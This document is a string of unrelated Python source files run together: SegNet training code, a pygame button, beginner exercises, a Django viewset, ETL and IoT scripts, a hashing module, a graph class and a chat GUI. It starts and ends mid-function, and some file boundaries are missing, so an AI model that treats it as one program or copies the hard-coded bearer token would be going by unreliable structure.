    Returns:
        The ReLU-activated, batch-normalized conv output.
    """
    def init_weight(val_name, vgg_weights):
        # pretrained kernel for this scope
        return vgg_weights[val_name][0]
    def init_bias(val_name, vgg_weights):
        # pretrained bias for this scope
        return vgg_weights[val_name][1]
    with tf.variable_scope(name) as scope:
        if use_vgg:
            print("here")
            conv_init = tf.constant_initializer(init_weight(scope.name, vgg_weights))
            # NOTE(review): wd=False means the weight-decay term multiplies to
            # zero inside variable_with_weight_decay -- confirm intent.
            conv_filt = variable_with_weight_decay("weights", initializer=conv_init, shape=shape, wd=False)
            #conv_filt = tf.get_variable('weights', shape=shape, initializer=conv_init)
            bias_init = tf.constant_initializer(init_bias(scope.name, vgg_weights))
            bias_filt = variable_with_weight_decay("biases", initializer=bias_init, shape=shape[3], wd=False)
            #bias_filt = tf.get_variable('biases', shape=shape[3], initializer=bias_init)
        else:
            conv_filt = tf.get_variable("weights", shape=shape, initializer=initialization(shape[0], shape[2]))
            bias_filt = tf.get_variable('biases', shape=shape[3], initializer=tf.constant_initializer(0.0))
        conv = tf.nn.conv2d(x, conv_filt, strides=[1, 1, 1, 1], padding='SAME')
        bias = tf.nn.bias_add(conv, bias_filt)
        conv_out = tf.nn.relu(batch_norm(bias, scope))
    return conv_out
def variable_with_weight_decay(name, initializer, shape, wd):
    """Create a variable, optionally registering an L2 weight-decay loss.

    Args:
        name: variable name within the current scope.
        initializer: initializer for the variable.
        shape: variable shape.
        wd: weight-decay coefficient; falsy (False/0/None) disables decay.

    Returns:
        The created tf.Variable.
    """
    var = tf.get_variable(name, shape, initializer=initializer)
    # Only register the decay term when a real coefficient is given; the
    # original unconditionally added l2_loss * wd, which with wd=False
    # (as conv_layer passes) just appended a useless zero to 'losses'.
    if wd:
        weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
        tf.add_to_collection('losses', weight_decay)
    return var
def batch_norm(bias_input, scope):
    """Batch-normalize *bias_input* without centering (beta disabled).

    NOTE(review): is_training is hard-coded to True, so inference would also
    use batch statistics -- confirm this is intended.
    """
    with tf.variable_scope(scope.name) as scope:
        return tf.contrib.layers.batch_norm(bias_input, is_training=True, center=False, scope=scope)
def max_pool(inputs, name):
    """2x2 stride-2 max pool that also returns the argmax indices (for later
    unpooling) and the pre-pool shape.

    NOTE(review): the to_double/to_float round trip is presumably a
    workaround for max_pool_with_argmax dtype limits -- verify.
    """
    with tf.variable_scope(name) as scope:
        value, index = tf.nn.max_pool_with_argmax(tf.to_double(inputs), ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=scope.name)
        return tf.to_float(value), index, inputs.get_shape().as_list()
def up_sampling(pool, ind, output_shape, batch_size, name=None):
    """SegNet-style unpooling: scatter pooled values back to the positions
    recorded by max_pool's argmax indices, producing a tensor of *output_shape*."""
    with tf.variable_scope(name):
        pool_ = tf.reshape(pool, [-1])
        # Prepend the batch index to each flat argmax index so scatter_nd can
        # address [batch, flattened_position].
        batch_range = tf.reshape(tf.range(batch_size, dtype=ind.dtype), [tf.shape(pool)[0], 1, 1, 1])
        b = tf.ones_like(ind) * batch_range
        b = tf.reshape(b, [-1, 1])
        ind_ = tf.reshape(ind, [-1, 1])
        ind_ = tf.concat([b, ind_], 1)
        ret = tf.scatter_nd(ind_, pool_, shape=[batch_size, output_shape[1] * output_shape[2] * output_shape[3]])
        ret = tf.reshape(ret, [tf.shape(pool)[0], output_shape[1], output_shape[2], output_shape[3]])
        return ret
def get_filename_list(path, config):
    """Parse an "image_path label_path" listing file.

    Each non-blank line of *path* must hold an image filename and a label
    filename separated by a space; both are returned with the Google Drive
    dataset root prepended.

    Args:
        path: path of the listing file.
        config: unused; kept for interface compatibility.

    Returns:
        (image_filenames, label_filenames): parallel lists of full paths.
    """
    image_filenames = []
    label_filenames = []
    # `with` guarantees the listing file is closed (the original leaked it),
    # and skipping blank lines avoids an IndexError on trailing newlines.
    with open(path) as fd:
        for line in fd:
            fields = line.strip().split(" ")
            if not fields[0]:
                continue
            image_filenames.append(fields[0])
            label_filenames.append(fields[1])
    #print(image_filenames)
    image_filenames = ['/content/drive/My Drive/SegNet'+ name for name in image_filenames]
    label_filenames = ['/content/drive/My Drive/SegNet'+ name for name in label_filenames]
    return image_filenames, label_filenames
def generate_data(images, labels):
    """Load parallel lists of image/label files with OpenCV.

    Args:
        images: list of image file paths.
        labels: list of label-image file paths (same length as *images*).

    Returns:
        (images_array, labels_array) numpy arrays of the decoded images.
        Note: cv2.imread returns None for unreadable files, which would end
        up in the arrays as-is.
    """
    images_num = []
    labels_num = []
    for x, y in zip(images, labels):
        image = cv2.imread(x)
        images_num.append(image)
        label = cv2.imread(y)
        labels_num.append(label)
    return np.array(images_num), np.array(labels_num)
def cal_loss(logits, labels, num_class=12):
    """Class-weighted cross-entropy loss plus pixel accuracy.

    Args:
        logits: raw per-pixel network outputs, reshapeable to [-1, num_class].
        labels: integer ground-truth class map.
        num_class: number of segmentation classes.

    Returns:
        (mean_loss, accuracy, predicted_class_ids) tensors.
    """
    #class weights relative to number of such classes; rare classes
    #(e.g. indices 2 and 6) get much larger weights
    loss_weight = np.array([
        0.2595,
        0.1826,
        4.5460,
        0.1417,
        0.9051,
        0.3826,
        9.6446,
        1.8418,
        0.6823,
        6.2478,
        7.3614,
        1.0974
    ])
    labels = tf.to_int64(labels)
    label_flatten = tf.reshape(labels, [-1])
    label_onehot = tf.one_hot(label_flatten , num_class)
    logit_reshape = tf.reshape(logits, [-1, num_class])
    # weighted_cross_entropy_with_logits broadcasts loss_weight over the
    # class axis as per-class positive weights
    cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=label_onehot, logits=logit_reshape, pos_weight=loss_weight)
    cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
    correct_prediction = tf.equal(tf.argmax(logit_reshape, -1), label_flatten)
    accuracy = tf.reduce_mean(tf.to_float(correct_prediction))
    return cross_entropy_mean, accuracy, tf.argmax(logit_reshape, -1)
#Credits: https://github.com/toimcio/SegNet-tensorflow
def per_class_acc(predictions, label_tensor, num_class):
    """Print overall accuracy, mean IU and per-class accuracy for a batch.

    Args:
        predictions: per-pixel class scores, shape [batch, H, W, num_class].
        label_tensor: integer ground-truth maps, shape [batch, H, W].
        num_class: number of segmentation classes.
    """
    labels = label_tensor
    size = predictions.shape[0]
    hist = np.zeros((num_class, num_class))
    # Accumulate a confusion matrix over the whole batch.
    for i in range(size):
        hist += fast_hist(labels[i].flatten(), predictions[i].argmax(2).flatten(), num_class)
    acc_total = np.diag(hist).sum() / hist.sum()
    print('accuracy = %f' % np.nanmean(acc_total))
    # IU = true_positive / (ground_truth + predicted - true_positive)
    iu = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
    print('mean IU = %f' % np.nanmean(iu))
    for ii in range(num_class):
        if float(hist.sum(1)[ii]) == 0:
            acc = 0.0
        else:
            acc = np.diag(hist)[ii] / float(hist.sum(1)[ii])
        print("class # %d accuracy = %f " % (ii, acc))
#Credits: https://github.com/toimcio/SegNet-tensorflow
def fast_hist(a, b, n):
    """n x n confusion matrix between label vector *a* and prediction vector
    *b*, counting only entries whose label lies in [0, n)."""
    valid = (a >= 0) & (a < n)
    combined = n * a[valid].astype(int) + b[valid]
    return np.bincount(combined, minlength=n ** 2).reshape(n, n)
#Credits: https://github.com/toimcio/SegNet-tensorflow
def get_hist(predictions, labels):
    """Accumulate a confusion matrix over a batch of per-pixel class-score
    maps (*predictions*, [batch, H, W, C]) and integer label maps (*labels*)."""
    num_class = predictions.shape[3]
    total = np.zeros((num_class, num_class))
    for sample in range(predictions.shape[0]):
        pred_ids = predictions[sample].argmax(2).flatten()
        total += fast_hist(labels[sample].flatten(), pred_ids, num_class)
    return total
#Credits: https://github.com/toimcio/SegNet-tensorflow
def print_hist_summary(hist):
    """Print overall accuracy, mean IU and per-class accuracy from a
    confusion matrix *hist* (rows = ground truth, cols = predictions)."""
    acc_total = np.diag(hist).sum() / hist.sum()
    print('accuracy = %f' % np.nanmean(acc_total))
    # IU = true_positive / (ground_truth + predicted - true_positive)
    iu = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
    print('mean IU = %f' % np.nanmean(iu))
    for ii in range(hist.shape[0]):
        if float(hist.sum(1)[ii]) == 0:
            acc = 0.0
        else:
            acc = np.diag(hist)[ii] / float(hist.sum(1)[ii])
        print("class # %d accuracy = %f " % (ii, acc))
def train_op(total_loss):
    """Create the SGD-with-momentum training op for *total_loss*.

    Uses the TF1 tf.train.MomentumOptimizer: the original
    tf.keras.optimizers.SGD has no compute_gradients /
    apply_gradients(global_step=...) interface, so this function raised
    AttributeError as written (the commented AdamOptimizer line shows the
    tf.train API was intended).

    Returns:
        (training_op, global_step, grads)
    """
    print("Training using SGD optimizer")
    global_step = tf.Variable(0, trainable=False)
    optimizer = tf.train.MomentumOptimizer(0.1, momentum=0.9)
    #optimizer = tf.train.AdamOptimizer(0.001, epsilon=0.0001)
    grads = optimizer.compute_gradients(total_loss, tf.trainable_variables())
    training_op = optimizer.apply_gradients(grads, global_step=global_step)
    return training_op, global_step, grads
|
import pygame
from color import Color
from settings import Settings
class Button:
    """Clickable rectangular UI button drawn on a pygame surface.

    `coords` and `text` may be plain values or zero-argument callables; they
    are re-evaluated on every access/draw so the button can follow layout
    changes.
    """
    def __init__(self, surface, coords, size, bg_color, text, function, *args):
        self.surface = surface
        self.coords = coords
        self.width, self.height = size
        self.bg_color = bg_color
        # self.border_color = Settings.BUTTON_BORDER_COLOR
        self.border_color = None
        # Pre-computed shades of the base color for hover/disabled states.
        self.hover_color = Color.shade_color(
            self.bg_color, Settings.COLOR_SHADE / 2)
        self.inactive_color = Color.shade_color(
            self.bg_color, -Settings.COLOR_SHADE)
        self.hovered = False
        self.text = text
        self.active = True
        # Callback (with *args) invoked by click().
        self.function = function
        self.args = args
        self.font = pygame.font.SysFont(
            'Consolas', Settings.BUTTON_TEXT_SIZE, bold=True)
    @property
    def x(self):
        # coords may be a callable returning (x, y)
        return self.coords()[0] if callable(self.coords) else self.coords[0]
    @property
    def y(self):
        return self.coords()[1] if callable(self.coords) else self.coords[1]
    @property
    def coords_4(self):
        # (x, y, w, h) rect tuple as pygame.draw.rect expects
        return self.x, self.y, self.width, self.height
    def update(self):
        """Refresh the hover state from the current mouse position."""
        if self.active:
            cursor = pygame.mouse.get_pos()
            if self.x < cursor[0] < self.x + self.width and self.y < cursor[1] < self.y + self.height:
                self.hovered = True
            else:
                self.hovered = False
    def draw(self):
        """Draw the button background (state-dependent color) and its label."""
        if not self.active:
            color = self.inactive_color
            # border_color = None
        elif self.hovered:
            color = self.hover_color
            # border_color = self.border_color
        else:
            color = self.bg_color
            # border_color = None
        pygame.draw.rect(self.surface, color, self.coords_4)
        # if border_color is not None:
        #     pygame.draw.rect(self.surface, self.border_color, self.coords_4, 2)
        self.show_text()
    def show_text(self):
        """Render the (possibly callable) label centered inside the button."""
        if self.text is not None:
            string = self.text() if callable(
                self.text) else self.text
            text_color = Settings.BUTTON_TEXT_COLOR if self.active else Settings.BUTTON_TEXT_INACTIVE_COLOR
            text = self.font.render(string, True, text_color)
            text_size = text.get_size()
            text_x = self.x + (self.width / 2) - (text_size[0] / 2)
            text_y = self.y + (self.height / 2) - (text_size[1] / 2)
            self.surface.blit(text, (text_x, text_y))
    def click(self):
        """Invoke the bound callback, if any."""
        if self.function is not None and callable(self.function):
            self.function(*self.args)
class ButtonFactory:
    """Convenience constructors for default-sized `Button` instances."""

    @staticmethod
    def create_button(surface, pos, color, text, function, *args):
        """Create a button of Settings.BUTTON_SIZE at `pos`."""
        return Button(surface, pos, Settings.BUTTON_SIZE,
                      color, text, function, *args)

    @staticmethod
    def create_button_centered(settings_instance, surface, color, text, function, *args):
        """Create a default-sized button at the settings-defined center position."""
        return ButtonFactory.create_button(
            surface, settings_instance.BUTTON_POS_CENTER, color, text, function, *args)
|
# Better Solution:
# https://www.acmicpc.net/source/13139101
# Read N votes (one per line); Junhee is cute if '1' holds a strict majority.
N = int(input())
cute = sum(1 for _ in range(N) if input() == '1')
print('Junhee is cute!' if cute > N // 2 else 'Junhee is not cute!')
|
from django.shortcuts import render
from rest_framework import status, viewsets
from .models import Dog
from .serializers import DogSerializer
# Create your views here.
class DogView(viewsets.ModelViewSet):
    """REST CRUD endpoints (list/retrieve/create/update/destroy) for Dog records."""
    queryset = Dog.objects.all()
    serializer_class = DogSerializer
import timeit

# Number of executions per measurement; per-call time = total time / loops.
loops = 1_000_000

# Benchmark 1: single C-level pass via str.translate with a maketrans table.
val = timeit.timeit("""to_rna("ACGTGGTCTTAA")""",
                    """
LOOKUP = str.maketrans("GCTA","CGAU")
def to_rna(dna_strand):
    return dna_strand.translate(LOOKUP)
""", number=loops) / loops
print(f"translate maketrans: {val}")

# Benchmark 2: per-character dict lookup joined back into a string.
# (Loop variable renamed from `chr`, which shadowed the builtin.)
val = timeit.timeit("""to_rna("ACGTGGTCTTAA")""",
                    """
LOOKUP = {"G": "C", "C": "G", "T": "A", "A": "U"}
def to_rna(dna_strand):
    return ''.join(LOOKUP[base] for base in dna_strand)
""", number=loops) / loops
print(f"dictionary join: {val}")
|
import numpy as np
import numpy.ma as ma
import warnings
from moMetrics import BaseMoMetric
__all__ = ['ValueAtHMetric']
class ValueAtHMetric(BaseMoMetric):
    """
    Return the value of a metric at a given H.

    :param Hmark: H magnitude at which to report the metric value.
    """
    def __init__(self, Hmark=22, **kwargs):
        metricName = 'Value At H=%.1f' %(Hmark)
        super(ValueAtHMetric, self).__init__(metricName=metricName, **kwargs)
        self.Hmark = Hmark

    def run(self, metricVals, Hvals):
        """Report metricVals at self.Hmark.

        :param metricVals: metric values, shape (nObjects, nH).
        :param Hvals: H values at which metricVals were evaluated.
        :return: metric value(s) at Hmark, or None when Hmark is out of range.
        """
        # Check if desired H value is within range of H values.
        if (self.Hmark < Hvals.min()) or (self.Hmark > Hvals.max()):
            warnings.warn('Desired H value of metric outside range of provided H values.')
            return None
        nHvals = len(Hvals)
        nHMetricVals = metricVals.shape[1]
        if nHvals == nHMetricVals:
            # Hvals matched the points where the metric values were calculated
            # (clone H distribution): pick the column closest to Hmark.
            diffs = np.abs(self.Hmark - Hvals)
            Hidx = np.where(diffs == diffs.min())[0]
            result = metricVals.swapaxes(0, 1)[Hidx]
            Hmark = Hvals[Hidx]
            self.name = 'Value At H=%.1f' %(Hmark)
        else:
            # One metric value per H: linearly interpolate to Hmark.
            # Fixed: np.interpolate does not exist in numpy; np.interp is the
            # 1-D linear interpolation routine.
            # NOTE(review): np.interp expects a 1-D fp array — confirm the
            # shape of metricVals on this branch.
            result = np.interp([self.Hmark], Hvals, metricVals.swapaxes(0, 1))
        return result
|
import unrealsdk
from builtins import tuple as _tuple
def get_player_controller():
    """
    Get the current WillowPlayerController Object.
    :return: WillowPlayerController
    """
    engine = unrealsdk.GetEngine()
    return engine.GamePlayers[0].Actor
def get_obj_path_name(object):
    """
    Get the full correct name of the provided object.
    :param object: UObject
    :return: String of the Path Name, or "None" for a falsy object.
    """
    return object.PathName(object) if object else "None"
def console_command(command, bWriteToLog=False):
    """
    Executes a normal console command
    :param command: String, the command to execute.
    :param bWriteToLog: Bool, write to Log
    :return: None
    """
    player_controller = get_player_controller()
    player_controller.ConsoleCommand(command, bWriteToLog)
def obj_is_in_class(obj, inClass):
    """
    Compares the given Objects class with the given class.
    :param obj: UObject
    :param inClass: String, the Class to compare with
    :return: Bool, whether or not it's in the Class.
    """
    target_class = unrealsdk.FindClass(inClass)
    return bool(obj.Class == target_class)
def get_weapon_holding():
    """
    Get the weapon the WillowPlayerPawn is currently holding.
    :return: WillowWeapon
    """
    actor = unrealsdk.GetEngine().GamePlayers[0].Actor
    return actor.Pawn.Weapon
def get_world_info():
    """Return the engine's current WorldInfo object."""
    engine = unrealsdk.GetEngine()
    return engine.GetCurrentWorldInfo()
def tuple(iteratable):
    """
    Convert an unrealsdk struct (FVector/FStruct/FRotator) into a plain tuple
    of its fields; anything else is passed to the builtin tuple (aliased as
    _tuple at import time because this function shadows it).
    :param iteratable: value to convert.
    :return: tuple of field values, or _tuple(iteratable).
    """
    if isinstance(iteratable, unrealsdk.FVector) or \
            isinstance(iteratable, unrealsdk.FStruct) or \
            isinstance(iteratable, unrealsdk.FRotator):
        # NOTE(review): assumes absent fields read as None rather than
        # raising AttributeError — confirm against the SDK.
        if iteratable.X is not None:
            if iteratable.Z is not None:
                # 3-component vector.
                return iteratable.X, iteratable.Y, iteratable.Z
            # 2-component vector (no Z).
            return iteratable.X, iteratable.Y
        # No X/Y/Z fields: treat as a rotator.
        return iteratable.Pitch, iteratable.Yaw, iteratable.Roll
    return _tuple(iteratable)
|
# The following formula can be used to determine the distance an object falls
# due to gravity in a specific time period, starting from rest:
# d = 1⁄2 gt^2
# The variables in the formula are as follows: d is the distance in meters, g is
# 9.8, and t is the amount of time in seconds, that the object has been falling.
# Write a function named falling_distance that accepts an object’s falling time
# in seconds as an argument. The function should return the distance in meters
# that the object has fallen during that time interval. Write a program that
# calls the function in a loop that passes the values 1 through 10 as arguments
# and displays the return value.
def main():
    """Print the fall distance for elapsed times of 1 through 10 seconds."""
    for time in range(1, 11):
        distance = falling_distance(time)
        print("Second/s: ", time, " Fall Distance: ", distance)

def falling_distance(t):
    """Return the distance (meters) an object falls from rest in t seconds.

    Uses d = 1/2 * g * t^2 with g = 9.8 m/s^2.
    """
    return .5 * 9.8 * t**2

main()
|
# Three distinct numbers are entered. Determine which one is the middle
# value (greater than one of the others but less than the remaining one).
n_1 = float(input('Введите первое число: '))
n_2 = float(input('Введите второе число: '))
n_3 = float(input('Введите третье число: '))
if n_3 > n_1 > n_2 or n_2 > n_1 > n_3:
    print(f'{n_1} является средним числом')
elif n_3 > n_2 > n_1 or n_1 > n_2 > n_3:
    print(f'{n_2} является средним числом')
else:
    print(f'{n_3} является средним числом')
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
    """
    Load messages and categories from two CSV files and merge them on 'id'.

    Args:
        messages_filepath: path of the CSV file containing the messages.
        categories_filepath: path of the CSV file containing the categories.

    Returns:
        A dataframe with each message joined to its categories row.
    """
    messages = pd.read_csv(messages_filepath)
    categories = pd.read_csv(categories_filepath)
    return pd.merge(messages, categories, on='id')
def clean_data(df):
    """
    Clean the merged messages/categories dataframe for machine learning.

    Splits the ';'-separated 'categories' column into one numeric 0/1 column
    per category, drops duplicate rows, and collapses the out-of-range value
    2 in 'related' to 1.

    Args:
        df: dataframe produced by load_data (must contain a 'categories'
            column of "name-value;name-value;..." strings).

    Returns:
        df: the cleaned dataframe.
    """
    # Split "name-value;..." into one column per category. The category
    # count is derived from the data instead of being hard-coded to 36,
    # and the original dead no-op split line is removed.
    categories = df['categories'].str.split(';', expand=True)
    categories.columns = [entry.split('-')[0] for entry in categories.iloc[0]]
    for col_name in categories.columns:
        # Keep only the value after the dash and make it numeric.
        categories[col_name] = pd.to_numeric(
            categories[col_name].str.split('-', expand=True)[1])
    df = pd.concat([df.drop(['categories'], axis=1), categories], axis=1)
    # drop duplicates
    df.drop_duplicates(inplace=True)
    # 'related' occasionally contains 2; map it onto the binary value 1.
    if 'related' in df.columns:
        df['related'] = df['related'].replace(2, 1)
    return df
def save_data(df, database_filename):
    """
    Save a dataframe into an SQLite database table named 'Disaster_Response'.

    Args:
        df: the dataframe to save.
        database_filename: the name of the file containing the database.

    Returns:
        nothing
    """
    engine = create_engine('sqlite:///' + database_filename)
    # if_exists='replace' lets the pipeline be re-run without failing on
    # "table Disaster_Response already exists".
    df.to_sql('Disaster_Response', engine, index=False, if_exists='replace')
def main():
    """
    Command-line entry point: load, clean, and persist the disaster data.

    Expects three arguments: the messages CSV path, the categories CSV
    path, and the target SQLite database path.
    """
    # Guard clause: bail out with usage help unless exactly 3 args given.
    if len(sys.argv) != 4:
        print('Please provide the filepaths of the messages and categories '\
              'datasets as the first and second argument respectively, as '\
              'well as the filepath of the database to save the cleaned data '\
              'to as the third argument. \n\nExample: python process_data.py '\
              'disaster_messages.csv disaster_categories.csv '\
              'DisasterResponse.db')
        return
    messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
    print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
          .format(messages_filepath, categories_filepath))
    df = load_data(messages_filepath, categories_filepath)
    print('Cleaning data...')
    df = clean_data(df)
    print('Saving data...\n DATABASE: {}'.format(database_filepath))
    save_data(df, database_filepath)
    print('Cleaned data saved to database!')

if __name__ == '__main__':
    main()
|
import requests
import random
import time
host = 'http://localhost'
port = '8443'
urlTemp = '/iot/temperature'
sensor1 = "28ff88b893160585"
sensor2 = "28ff6ef293160466"
token = '5ccf1c4c-90d8-42e5-8338-ad4d40f677b2'
#token = '748d34a0-67d6-4232-aa00-0263a4112ef7'
hed = {'Authorization': 'Bearer ' + token}
def request(sensor_id):
    """
    POST a random temperature reading for the given sensor to the IoT API.

    :param sensor_id: sensor identifier string sent in the JSON body.
    """
    # requests.post(url, data, json): data is None, so the dict is the
    # `json` argument and is sent as a JSON body with the bearer header.
    response = requests.post(host + ':' + port + urlTemp, None,
                             {'value': random_temp(), 'sensorId': sensor_id, 'deviceId': 'ccc'}, headers=hed)
    print(response)
def random_temp():
    """Return a random temperature in [19.00, 21.00) formatted to 2 decimals."""
    value = (random.random() * 100) % 2 + 19
    return "%2.2f" % value
if __name__ == '__main__':
    # Send a reading for both sensors every 5 seconds, forever (Ctrl-C to stop).
    while True:
        print('sent temp')
        request(sensor1)
        request(sensor2)
        time.sleep(5)
|
#!/usr/bin/python
"""
Hashing of plain data types
Hopefully there's better way to do this
"""
import struct
import hashlib
from dataclasses import fields, is_dataclass
def merklize(x):
    """
    Calculate the SHA-256 hash of a plain-data value.
    """
    hasher = hashlib.sha256()
    merklize_rec(hasher, x)
    return hasher.digest()
def merklize_rec(acc, x):
    """
    Hash the given value incrementally into the hashlib accumulator `acc`.

    The type's module and name are mixed in first, so equal payloads of
    different types produce different hashes.
    """
    ty = type(x)
    acc.update(ty.__module__.encode('utf-8'))
    acc.update(ty.__name__.encode('utf-8'))
    if not is_dataclass(ty):
        lookup[ty](acc, x)
        return
    # Dataclasses: hash fields in a deterministic (sorted-by-name) order.
    for nm in sorted(f.name for f in fields(ty)):
        acc.update(nm.encode('utf-8'))
        merklize_rec(acc, x.__dict__[nm])
def hashing_bs(to_bs):
    "Build a hasher that feeds the bytes of to_bs(x) into the accumulator."
    def hasher(acc, x):
        acc.update(to_bs(x))
    return hasher
def hashing_list(acc, xs):
    "Hash every list element, in order, into the accumulator."
    for item in xs:
        merklize_rec(acc, item)
def hashing_dict(acc, xs):
    """Hash a dictionary deterministically (entries sorted by key).

    Fixed: merklize_rec was called without the accumulator argument, which
    raised TypeError for every dict input.
    """
    for k, v in sorted(xs.items()):
        merklize_rec(acc, k)
        merklize_rec(acc, v)
# Lookup table of hashing algorithms, keyed by value type.
lookup = {
    type(None): lambda acc, x: None,          # nothing beyond the type tag
    bytes:      hashing_bs(lambda x: x),      # added: raw bytes, hashed as-is
    bytearray:  hashing_bs(lambda x: x),
    bool:       hashing_bs(lambda b: struct.pack('b', b)),
    # NOTE(review): 'l' is platform-sized and raises for out-of-range ints.
    int:        hashing_bs(lambda i: struct.pack('l', i)),
    float:      hashing_bs(lambda x: struct.pack('d', x)),
    str:        hashing_bs(lambda s: s.encode('utf-8')),
    # Containers
    list:       hashing_list,
    dict:       hashing_dict,
}
|
from flask import Flask, jsonify, request
import Calculations
app = Flask(__name__)
@app.route('/identification', methods=["POST"])
def faces():
    """POST /identification: run face recognition on the JSON body and return the result as JSON."""
    result = Calculations.recognition(request.get_json(force = True))
    return jsonify(result)
if __name__ == '__main__':
    # Development server only; debug=True must not be used in production.
    app.run(debug = True, port=5000)
|
def Chess():
    """Print an h-by-v checkerboard of '*' and '#' based on user input."""
    h=int(input('Please specify the number of sections in the horizontal direction : '))
    v=int(input('Please specify the number of sections in the vertical direction : '))
    for row in range(v):
        # Cells where row+column is odd get '#', the rest get '*'.
        line = ''.join('#' if (row + col) % 2 == 1 else '*' for col in range(h))
        print(line)
Chess()
class Node:
    """
    A graph node identified by an immutable name, holding a weighted
    adjacency mapping {neighbor name: edge weight}.
    """

    def __init__(self, name):
        """The method does not have to test the validity of name."""
        self.name = name           # the name of the node
        hash(name)                 # name can be any immutable object,
                                   # most naturally a string or a number.
        self.neighbors = dict()    # neighbor names -> weights of the
                                   # corresponding edges.

    def __hash__(self):
        return hash(self.name)

    def __str__(self):
        return str(self.name)

    def __len__(self):
        """
        :return: the number of neighbors
        """
        return len(self.neighbors)

    def __eq__(self, other):
        """
        Compare based on the name attribute; `other` may be a Node or a
        raw name. (Replaces the original Node(other) round-trip, which
        relied on reflected comparison to work.)
        :return: bool
        """
        other_name = other.name if isinstance(other, Node) else other
        return self.name == other_name

    def __ne__(self, other):
        """
        Negation of __eq__ (the original required other to be a Node,
        inconsistently with __eq__).
        :return: bool
        """
        return not self.__eq__(other)

    def is_neighbor(self, name):
        """
        :param name:
        :return: True if name is a neighbor of self.
        """
        return name in self.neighbors

    def add_neighbor(self, other, weight=1):
        """
        Adds `other` as a neighbor of self.
        This method does not test whether a node named `other` exists.
        Raises ValueError when the neighbor already exists, and NameError
        when other names self.
        :param other: neighbor name
        :param weight: something convertible to float (negative allowed)
        """
        if other == self:
            raise NameError("Node can not be neighbor of itself."+str(self))
        if self.is_neighbor(other):
            raise ValueError("This Node is already a neighbor: " + str(other) +
                             " with weight:" + str(self.neighbors[other]))
        # I allow negative values
        self.neighbors[other] = float(weight)

    def copy_neighbors_of(self, node):
        """
        Copies only the not-yet-present neighbors from node.
        :param node: Node to copy from
        """
        for neighbor in node.neighbors:
            if neighbor not in self.neighbors:
                self.add_neighbor(neighbor, node.get_weight(neighbor))

    def remove_neighbor(self, other):
        """
        Removes `other` from being a neighbor of self.
        Does not fail if `other` is not a neighbor (fixed: pop() used to
        raise KeyError, contradicting this contract).
        """
        self.neighbors.pop(other, None)

    def get_weight(self, name):
        """
        Returns None if name is not a neighbor of self (fixed: the direct
        indexing used to raise KeyError, contradicting this contract).
        :param name:
        :return: the weight of the relevant edge, or None.
        """
        return self.neighbors.get(name)

    def get_total_weight(self):
        """Sum of all outgoing edge weights."""
        return sum(self.neighbors.values())

    def is_isolated(self):
        """
        Returns True if self has no neighbors.
        """
        return len(self.neighbors) == 0

    def get_edges(self):
        """Iterate (self name, neighbor name, weight) triples.

        Fixed: the original used a Python-2-only tuple-unpacking lambda,
        which is a SyntaxError under Python 3.
        """
        return ((str(self), str(n), w) for n, w in self.neighbors.items())

    def get_neighbors_names(self):
        """Return the neighbor-name -> weight mapping (iterating it yields names)."""
        return self.neighbors

    def dump(self, indentation='\t'):
        """Human-readable multi-line description of the node and its edges."""
        prefix = "node {:>4}:".format(str(self))
        if self.is_isolated():
            return prefix + " is_isolated!"
        edges = map(lambda n: " -->{:>2} : w={:>4}".format(n, self.get_weight(n)),
                    self.neighbors)
        seperator = "\n  {}".format(indentation)
        return prefix + seperator + seperator.join(edges)
|
import PySimpleGUI as sg
from easychat_package import base64files
#the first host/join screen
def choice():
    """Show the initial Host/Join window.

    Stores the window and the clicked-button event in the module globals
    `window` and `event`; exits the process if the window is closed.
    """
    global logo
    logo=base64files.static_logo
    global window
    global event
    sg.theme("light purple")
    layout = [[sg.Image(data=logo)],
              [sg.Button('Host (as Server)'), sg.Button('Join (as Client)')]]
    window = sg.Window('easyChat', layout, grab_anywhere=True, icon=r"D:\Downloads\ec2.ico")
    event, values = window.read() # Read the event that happened and the values dictionary.
    if event == sg.WIN_CLOSED: # If user closed window with X
        exit()
#entering server name/creds
def server_gui():
    """Show the host login window.

    Stores the chosen display name and SQL password in the module globals
    `server_name` and `server_pwd`; exits the process on window close.
    """
    global logo
    logo=base64files.static_logo
    global server_name
    global server_pwd   # fixed: was declared global twice in this function
    layout = [[sg.Image(data=logo, size=(400,400))],
              [sg.Text('Enter your name, Server',justification='center',size=(50,1))],
              [sg.InputText("Dorian",size=(57,1), key="-name-")],
              [sg.Text('...',justification='center',size=(50,1))],
              [sg.Text('Enter your sql credentials',justification='center',size=(50,1))],
              [sg.Text(' If this is your first time hosting on this device, we will create a new',justification='center',size=(50,1))],
              [sg.Text('database called <easychat>,',justification='center',size=(50,1))],
              [sg.Text('and within it two new tables for the purposes of this program.',justification='center',size=(50,1))],
              [sg.Text('If not, we will use the database and tables created on the first use.',justification='center',size=(50,1))],
              [sg.InputText(size=(57,1),key="-pwd-")],
              [sg.Submit('Log in',size=(50,1))]]
    # (typos fixed in the two informational lines above: "databse"/"dababase")
    sg.theme('Light Purple')
    window = sg.Window('easyChat', layout)
    event, values = window.read()
    if event == sg.WIN_CLOSED:
        exit()
    window.close(); del window
    # Fall back to "Server" when the name field is left empty.
    server_name = values["-name-"] or "Server"
    server_pwd=str(values["-pwd-"])
#waiting for client to join
def conn_wait(host):
    """Build the 'waiting for incoming connections' window (with loading gif)
    and store it in the module global `window`. Does not call read()."""
    global window
    layout=[[sg.Text(f"Server will start on host: {host} and port: 2903",size=(50,1))],
            [sg.Text("Binded all IPv4 to 2903.",size=(50,1))],
            [sg.Text("Waiting for incoming connections",size=(50,1))],
            [sg.Image(r"media/purpleload.gif",key="-GIF-",background_color="black")], #I haven't used a base64 string for this since gif base64s are just way too long.
            [sg.Button("Cancel")]]
    sg.theme('Light Purple')
    window = sg.Window('easyChat', layout)
def conn_popup(addr):
    """Show a brief auto-closing (2s) popup announcing that `addr` connected."""
    sg.popup_no_buttons(addr, "has connected to the server, and is now online.", keep_on_top=True, no_titlebar=True,auto_close=True,auto_close_duration=2)
def client_gui():
